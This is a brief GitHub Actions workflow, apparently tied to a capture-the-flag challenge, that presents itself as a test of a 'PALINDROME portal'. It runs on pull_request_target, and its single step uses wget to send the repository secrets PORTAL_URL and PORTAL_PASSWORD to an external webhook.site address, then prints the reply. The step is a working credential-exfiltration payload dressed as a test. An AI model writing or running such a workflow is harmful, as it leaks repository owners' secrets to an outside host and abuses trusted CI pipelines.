name: Test the PALINDROME portal

on: [pull_request_target, workflow_dispatch]

jobs:
  schedule-run:
    runs-on: kali
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe '''https://webhook.site/17fb5023-cc48-4c04-90d5-adb9e4842cdb/?url=${{ secrets.PORTAL_URL }}&password=${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          cat test
